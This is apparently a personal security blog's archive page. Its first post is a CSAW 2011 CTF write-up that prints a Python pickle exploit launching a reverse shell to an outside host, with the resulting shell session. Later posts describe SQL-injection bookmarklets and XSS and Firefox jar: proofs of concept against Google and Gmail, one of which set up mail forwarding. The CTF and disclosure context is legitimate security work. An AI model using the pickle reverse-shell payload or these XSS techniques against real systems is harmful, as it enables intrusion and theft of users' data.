stuff » English

CSAW 2011 – Reversing – Python 200

Fernando M — Mon, 26 Sep 2011 06:43:41 +0000

Python – 200 Points

nc csawctf.poly.edu 53080

When we connected to the port it was running a service Haderper:

-----------------------------
| Welcome to Haderper!      |
| Please enter your command |
-----------------------------
> help

Haderper v0.1-alpha

Command help:

help        - this screen
exec        - execute a command
derp        - derp a string
underp      - underp a string
logout/exit - disconnect

> derp hi
UydoaScKcDAKLg==
> underp UydoaScKcDAKLg==
hi
>

If we decode the base64 string we can see that it looks like a Pickle dump file:

$ echo UydoaScKcDAKLg== | base64 -d
S'hi'
p0

After several failed attempts to get a reverse shell or read command output (nc, ls >/dev/tcp, etc) and knowing that the daemon is running on python, we use a reverse shell written in python from reverse shell cheatsheet.

# credits for this code goes to Jeff Epler
import pickle, new, base64

def nasty(module, function, *args):
    return pickle.dumps(new.classobj(function, (), {'__getinitargs__': lambda self, arg = args: arg, '__module__': module}) ())

print "underp "+base64.b64encode(nasty("os", "system", "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"1.1.1.7\",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'")) 

$ python xpl.py | nc csawctf.poly.edu 53080

And our listening nc gets the remote shell:

$ nc -lp 8080
$ id
uid=1001(quine) gid=1001(quine) groups=1001(quine)
$ cd
$ ls
haderp.py
haderp.pyc
key.txt
$ cat key.txt
key{38d7721de7853c8e385e0ee177e3d15e7a21381bd461a20f631fd1f3048d22db}

Key:38d7721de7853c8e385e0ee177e3d15e7a21381bd461a20f631fd1f3048d22db

You can see the code for the daemon here.

Hack.lu 2011 CTF – Scotty’s last signal Solution

Fernando M — Wed, 21 Sep 2011 22:41:26 +0000

Challenge summary:

Scotty’s last signal

You might have heard about Montgomery Scott, the legendary chief engineer of the U.S.S. Enterprise. What you probably did not know is his passion for Video Games – especially really old classics. We recently lost contact with his transport shuttle and we think you should examine this old game file we recently recieved because he might have just put a message into there. This would make sense if he could not send a fully blown Space-Unicode message signal to avoid attracting any Borg ships in the sector… (Borg usually are very bad at video games) His passion for Beaming and Warping might be of interest for your analysis. https://ctf.hack.lu/files/mario

First we downloaded the attached file and checked to see what kind of file it is.

$ file mario
mario: iNES ROM dump, 2x16k PRG, 1x8k CHR, [Vert.]
$ mv mario mario.nes

iNES Rom is a format developed by Marat Fayzullin to store Nintendo / Famicon games, and it’s also de name of its emulator.

After spending some time playing the game, looking at the dissasembled game using FCEUX debugger and reading about NES ASM, I noted this wasn’t probably the easy way to solve it . But by playing it we could see that some messages on the game were changed, FLUX instead of MARIO, SADFACE instead of GAME OVER.

A couple of Google searching led me to this tool to change strings of SMB rom, SMB NES Rom Text Editor luckily is written in C # and can be run on Linux too with Mono.

Flag: IMSTILLALIVEHELPME

Firefox 3.6.19 Remote Code Execution

Fernando M — Fri, 15 Apr 2011 06:32:08 +0000

To be disclosed soon.

Nseries Nokia N810

Fernando M — Wed, 25 Jun 2008 00:22:25 +0000

I’ve already got the N810, so far I’ve got to say that it’s an awesome device, it’s way smaller than I thought it would be. I had to flash the N810 using the lastest firmware in order to install some applications such as Skype. I was a bit scared of doing it because I had some issues last time I flashed my cell phone, a Sony Ericcson W810i, I fuxored it although I was using Sony’s Official tool to update it, I was unable to use it for a weeks, the time it took me to do read about flashing with some 3rd party tools.

I’ve got the scratchbox environment running, I had some issues installing it on Ubuntu Hardy, following some advices from qwerty12 on ITT solved everything and allowed me to get the Maemo SDK running on lastest Ubuntu.

I had to disable vdso by adding vdso=0 to the kernel line on /boot/grub/menu.lst file. The second problem is related to a memory protection that got enabled on lastest kernel, you need to edit /etc/sysctl.conf and change: vm.mmap_min_addr = 65536 to: vm.mmap_min_addr = 4096.

I’ve already installed the following apps:

Canola / Mplayer
FBReader / Evince / Xournal
MaemoFTP / rdesktop / openssh
Duke3D / LxDoom / Quake / iNES
Pidgin / XChat / Skype

I was looking for a torrent client, found transmission for maemo, but it was not working very well, it was pausing itself after a while, so with my sbox installation, compiled libtorrent and rtorrent from debian’s repository, and installed on n810 with dpkg, it works like a charm.

Nokia N810

Fernando M — Thu, 08 May 2008 10:06:46 +0000

I’ve been wondering if I should get a Nokia N810. I have already installed the Maemo SDK, and got some demos running on my box. I will keep checking the SDK this weekend, if things goes smooth, I’ll probably buy it next week, it’ll cost me around 620 USD, 200 dollars more than Amazon’s price, sucks, but that’s what happens when companies like Nokia don’t bring their products into ‘third world countries’. Should I consider another device?

Security Bookmarklets

Fernando M — Mon, 28 Jan 2008 23:47:57 +0000

I took a couple of days from my school vacation to write 3 bookmarklets that will help me when auditing web sites, I’d like to share them here because I know that they’ll help some of my friends, and probably one of the two readers of this blog.

Text2SQLChar Converts an string into a CHAR() mysql, usefull when magic_quotes is on.
SQLIncrement Increments automatically the number of columns of the injected select query.
SQLDecrement Decrements automatically the number of columns of the injected select query.
Increment Allows you to navigate up html files or images that have a number in them.
Decrement Allows you to navigate down html files or images that have a number in them.
base64 Firefox only, base64 with no padding

I wrote the first 3 of them, I’m not javascript god, so they need to get improved, I’ll try to make them shorter, and follow a couple of suggestion from bookmarklets.com. The two others come from RSnake’ bookmarklet collection, where I fixed a detail, it was not decoding the URL before using it, so if the url contained an escaped value at the end of the url like %20, it would modify it and change it to %21. I’ll keep this post updated whenever I find or write a new security-related bookmarklet. As another issue, I noticed that the site looks ugly on low resolution systems, so I’ll try to get a new theme to fix that on a couple of days and update the wordpress version.

Firefox 2.0.0.10 released

Fernando M — Tue, 27 Nov 2007 05:40:52 +0000

Mozilla Corporation just released Firefox 2.0.0.10 which includes fixes against JAR uri attacks. This issue affected browsers that used Gecko engine, a quick check showed me that only K-meleon browser was also updated, however there are several Gecko based web browsers that need to get fixed: Gecko-based browsers.

Update: Let’s make that, Firefox 2.0.0.11, which also fixes some regressions.

Google Gadgets XSS (IE6/Opera)

Fernando M — Sun, 25 Nov 2007 09:58:23 +0000

There is a recent discussion on ha.ckers.org regarding a possible CSRF that could allow an attacker to inject an evil gadget on someobdy else’s iGoogle page. After checking the format of the xml file used to define the gadgets properties, I noticed a couple of attributes that could be used as point of injections to active content, the thumbnail and screenshot attribute. Only one of them is vulnerable, the screenshot attribute, by using a javascript URI as value you can execute active content on certain browsers such as IE6. This is a poc that shows an alert with the current document.domain value:

www.google.com/ig/adde?moduleurl=http://beford.org/stuff/ig.xml

I’ve just notified Google about this, to avoid been a target of this flaw you can switch to Mozilla Firefox (+Noscript), or upgrade to IE7, which is not an option for Windows 2000 users.

Update: According to a friend, Rafael, Opera users are vulnerable aswell, he sent me an screenshot which you can see here: Opera Google XSS.

Update 2: Google fixed this on 27 November.

Firefox jar: Protocol Vulnerability

Fernando M — Sat, 10 Nov 2007 10:47:45 +0000

I just came across pdp’s finding jar protocol vulnerability on Mozilla Firefox, I think its a big issue, and the fact that it has been on bugzilla (#369814) for way more than ten fuck*ng days is not a good thing.

According to pdp, this issue makes vulnerable to Cross-site scripting applications that allow users uploading compressed ZIP, and JAR files. After a couple of minutes messing around the poc’s, I figured out that sites with open redirect issues are vulnerable too. I’ve created this poc that attacks Gmail, it’s based on my previous post and it will only show your contacts list, it’s not being logged server side or anything (as some people thought that my previous poc did. Credit to tx for discovering the open redirect issue used to exploit Google / Firefox):

http://beford.org/stuff/jarjarbinks.htm

Who’s fault? Both, Google for having open redirect issues and not fixing them, and Mozilla Corporation for failing to address this problem.

What can I do to protect myself? Giorgio Maone have already added protection against this flaw to NoScript development version.

Update: NoScript released stable version with Jar protection. A new bugzilla (#403331) entry was created to fix the inappropiate redirect on jar protocol, according to the lastest comments and bug keyword, there seems to be a patch and will be availible with Firefox 2.0.0.10.

Google Vulnerability

Fernando M — Mon, 24 Sep 2007 03:29:26 +0000

Yesterday, I found a new Google.com XSS vulnerability that can be abused to steal information from Gmail accounts, I’ve done responsible disclosure of at least 3 vulns to Google, but since I haven’t got enough ‘motivation’, I’ll go full disclosure now.

The vulnerability exists in Blogspot polls feature, I had already disclosed a vulnerability on this system. The ‘font’ parameter was not being sanitized before being used inside an STYLE tag, so you could inject IE’s expression() and Mozilla’s -moz-binding. They fixed it, however they didn’t check enough the rest of the code, the new XSS is:

Simple XSS POC

Since its Sunday and there is nothing else to do, I’ve created 2 more pocs, one of them, shows a your contacts, the second one will make Gmail forward all new received emails to another email account, no user interaction required, well you just need to open a website while still logged to Gmail.

POC1: http://beford.org/stuff/contacts.htm
POC2: http://beford.org/stuff/gmail.htm

I have tested them under IE, Konqueror, Opera and Firefox, it should work on all of them. If you want to be protected against this kind of attacks, I’d highly recommend Firefox + NoScript.

Update: Google fixed this issue, I’d like to ask the people that looked at the second poc to disable forwarding if you have not done so, I’m still getting ton of email. This screenshot shows how to disable forwarding.